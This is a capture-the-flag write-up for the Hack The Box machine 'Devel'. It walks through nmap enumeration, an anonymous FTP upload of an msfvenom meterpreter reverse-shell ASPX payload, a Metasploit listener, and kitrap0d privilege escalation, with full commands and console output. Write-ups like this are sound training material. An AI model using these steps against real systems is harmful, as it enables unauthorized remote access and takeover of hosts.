DEVEL

Enumeration:

First we start by enumerating the machine to see what is waiting for us!

root@kali:~# nmap -sV -sC 10.10.10.5

Starting Nmap 7.60 ( https://nmap.org ) at 2017-12-25 00:53 UTC
Nmap scan report for 10.10.10.5
Host is up (0.016s latency).
Not shown: 998 filtered ports
PORT   STATE SERVICE VERSION
21/tcp open  ftp     Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 03-18-17  01:06AM       <DIR>          aspnet_client
| 03-17-17  04:37PM                  689 iisstart.htm
|_03-17-17  04:37PM               184946 welcome.png
| ftp-syst:
|_  SYST: Windows_NT
80/tcp open  http    Microsoft IIS httpd 7.5
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: IIS7
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Here we can see that there is an ftp server on port 21 and the web server Microsoft IIS on port 80 are both open. Also, we realise that the ftp server allows anonymous login, let's see what we can do there...

root@kali:~# ftp 10.10.10.5
Connected to 10.10.10.5.
220 Microsoft FTP Service
Name (10.10.10.5:root): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> dir
200 PORT command successful.
125 Data connection already open; Transfer starting.
03-18-17  01:06AM       <DIR>          aspnet_client
03-17-17  04:37PM                  689 iisstart.htm
03-17-17  04:37PM               184946 welcome.png
226 Transfer complete.
ftp>

We can actually upload any file to the server and browse to it. Our goal here is to get access to the box via reverse shell to our machine. So, let's prepare our payload and upload it to the ftp server.

root@kali:~# msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.x.x LPORT=4444 -f aspx > shell.aspx
No platform was selected, choosing Msf::Module::Platform::Windows from the payload
No Arch selected, selecting Arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 333 bytes
Final size of aspx file: 2797 bytes

As you can see from the above command, we used 'msfvenom' to create our payload and selected the payload type  which is "Windows" in our case as this is the OS of the machine we are targeting. Then, we specified the listening host which is the attacking machine and the port that we need to listen on. Now, we need to prepare our listener and upload the payload to the server via ftp.

root@kali:~/Desktop# ftp 10.10.10.5
Connected to 10.10.10.5.
220 Microsoft FTP Service
Name (10.10.10.5:root): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> dir
200 PORT command successful.
125 Data connection already open; Transfer starting.
03-18-17  01:06AM       <DIR>          aspnet_client
03-17-17  04:37PM                  689 iisstart.htm
03-17-17  04:37PM               184946 welcome.png
226 Transfer complete.
ftp> put shell.aspx
local: shell.aspx remote: shell.aspx
200 PORT command successful.
150 Opening ASCII mode data connection.
226 Transfer complete.
2833 bytes sent in 0.00 secs (10.7213 MB/s)
ftp>

We successfully uploaded our payload which is called "shell.aspx". Now we need to start our listener before we browse to our payload. For the listener we can use Netcat or Metasploit, for this box we are going to use Metasploit.

Exploitation:

msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 10.10.x.x
LHOST => 10.10.x.x
msf exploit(handler) > set LPORT 4444
LPORT => 4444
msf exploit(handler) > run
[*] Exploit running as background job 0.

[*] Started reverse TCP handler on 10.10.x.x:4444

The listener is now ready, having the same payload setup and waiting for connection on port 4444. Now if we browsed to the payload we should get a meterpreter session back. Will browse to 'http://10.10.10.5/shell.aspx'

msf exploit(handler) >
[*] Sending stage (179267 bytes) to 10.10.10.5
[*] Meterpreter session 1 opened (10.10.x.x:4444 -> 10.10.10.5:49158) at 2017-12-25 01:06:06 +0000

msf exploit(handler) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > pwd
c:\windows\system32\inetsrv

meterpreter > shell
Process 1776 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

c:\users>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 8620-71F1

 Directory of c:\users

18/03/2017  01:16 ��    <DIR>          .
18/03/2017  01:16 ��    <DIR>          ..
18/03/2017  01:16 ��    <DIR>          Administrator
17/03/2017  04:17 ��    <DIR>          babis
18/03/2017  01:06 ��    <DIR>          Classic .NET AppPool
14/07/2009  09:20 ��    <DIR>          Public
               0 File(s)              0 bytes
               6 Dir(s)  23.711.891.456 bytes free

c:\users>cd babis
cd babis
Access is denied.

c:\users>cd administrator
cd administrator
Access is denied.

Opaaa, and we have a Meterpreter session 1 opened... but we can't access the user or administrator accounts, which means we need to escalate our privileges. But first, let's check some information about the machine which will help us in the privilege escalation process.

c:\users>systeminfo
systeminfo

Host Name:                 DEVEL
OS Name:                   Microsoft Windows 7 Enterprise
OS Version:                6.1.7600 N/A Build 7600
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Standalone Workstation
OS Build Type:             Multiprocessor Free
Registered Owner:          babis
Registered Organization:   
Product ID:                00392-918-5000002-85765
Original Install Date:     17/3/2017, 4:17:31 ��
System Boot Time:          24/12/2017, 10:39:35 ��
System Manufacturer:       VMware, Inc.
System Model:              VMware Virtual Platform
System Type:               X86-based PC
Processor(s):              1 Processor(s) Installed.
                           [01]: x64 Family 6 Model 63 Stepping 2 GenuineIntel ~2594 Mhz
BIOS Version:              Phoenix Technologies LTD 6.00, 5/4/2016
Windows Directory:         C:\Windows
System Directory:          C:\Windows\system32
Boot Device:               \Device\HarddiskVolume1
System Locale:             el;Greek
Input Locale:              en-us;English (United States)
Time Zone:                 (UTC+02:00) Athens, Bucharest, Istanbul
Total Physical Memory:     1.024 MB
Available Physical Memory: 739 MB
Virtual Memory: Max Size:  2.048 MB
Virtual Memory: Available: 1.544 MB
Virtual Memory: In Use:    504 MB
Page File Location(s):     C:\pagefile.sys
Domain:                    HTB
Logon Server:              N/A
Hotfix(s):                 N/A
Network Card(s):           1 NIC(s) Installed.
                           [01]: Intel(R) PRO/1000 MT Network Connection
                                 Connection Name: Local Area Connection
                                 DHCP Enabled:    No
                                 IP address(es)
                                 [01]: 10.10.10.5

We can see from the "Hotfix" that the machine never been updated, so let's check for possible attacks using metasploit suggester (use post/multi/recon/local_exploit_suggester). This module will check the machine against multiple attacks which will allow us to take system account.

msf post(local_exploit_suggester) > show options

Module options (post/multi/recon/local_exploit_suggester):

   Name             Current Setting  Required  Description
   ----             ---------------  --------  -----------
   SESSION                           yes       The session to run this module on.
   SHOWDESCRIPTION  false            yes       Displays a detailed description for the available exploits

msf post(local_exploit_suggester) > set SESSION 1
SESSION => 1
msf post(local_exploit_suggester) > run

[*] 10.10.10.5 - Collecting local exploits for x86/windows...
[*] 10.10.10.5 - 37 exploit checks are being tried...
[+] 10.10.10.5 - exploit/windows/local/bypassuac_eventvwr: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms10_015_kitrap0d: The target service is running, but could not be validated.
[+] 10.10.10.5 - exploit/windows/local/ms10_092_schelevator: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms13_053_schlamperei: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms13_081_track_popup_menu: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms14_058_track_popup_menu: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms15_004_tswbproxy: The target service is running, but could not be validated.
[+] 10.10.10.5 - exploit/windows/local/ms15_051_client_copy_image: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms16_016_webdav: The target service is running, but could not be validated.
[+] 10.10.10.5 - exploit/windows/local/ms16_032_secondary_logon_handle_privesc: The target service is running, but could not be validated.
[+] 10.10.10.5 - exploit/windows/local/ppr_flatten_rec: The target appears to be vulnerable.
[*] Post module execution completed

Here we can see that the machine is vulnerable against different kind of attacks as the machine running windows 7 never been updated since its release date which is in 2009. So basically any of the above attacks should give us system access.

msf exploit(ms10_015_kitrap0d) > set SESSION 1
SESSION => 1
msf exploit(ms10_015_kitrap0d) > set LPORT 4444
LPORT => 4444
msf exploit(ms10_015_kitrap0d) > exploit

[*] Started reverse TCP handler on 10.10.x.x:4444
[*] Launching notepad to host the exploit...
[+] Process 452 launched.
[*] Reflectively injecting the exploit DLL into 452...
[*] Injecting exploit into 452 ...
[*] Exploit injected. Injecting payload into 452...
[*] Payload injected. Executing exploit...
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Sending stage (179267 bytes) to 10.10.10.5
[*] Meterpreter session 2 opened (10.10.x.x:4444 -> 10.10.10.5:49158) at 2017-12-25 01:23:36 +0000

meterpreter > pwd
c:\windows\system32\inetsrv
meterpreter > shell
Process 1004 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

c:\windows\system32\inetsrv>cd  c:/users/administrator
cd  c:/users/administrator

c:\Users\Administrator>
c:\Users\Administrator\Desktop>dir          
dir
 Volume in drive C has no label.
 Volume Serial Number is 8620-71F1

 Directory of c:\Users\Administrator\Desktop

18/03/2017  01:17 ��    <DIR>          .
18/03/2017  01:17 ��    <DIR>          ..
18/03/2017  01:17 ��                32 root.txt.txt
               1 File(s)             32 bytes
               2 Dir(s)  23.539.904.512 bytes free

c:\Users\Administrator\Desktop>type root.txt.txt

Here we go, we got system privileges and now we can grab the root and user  flags. Happy hacking :D

© 2018 by Joul Kouchakji

  • White LinkedIn Icon
  • White Twitter Icon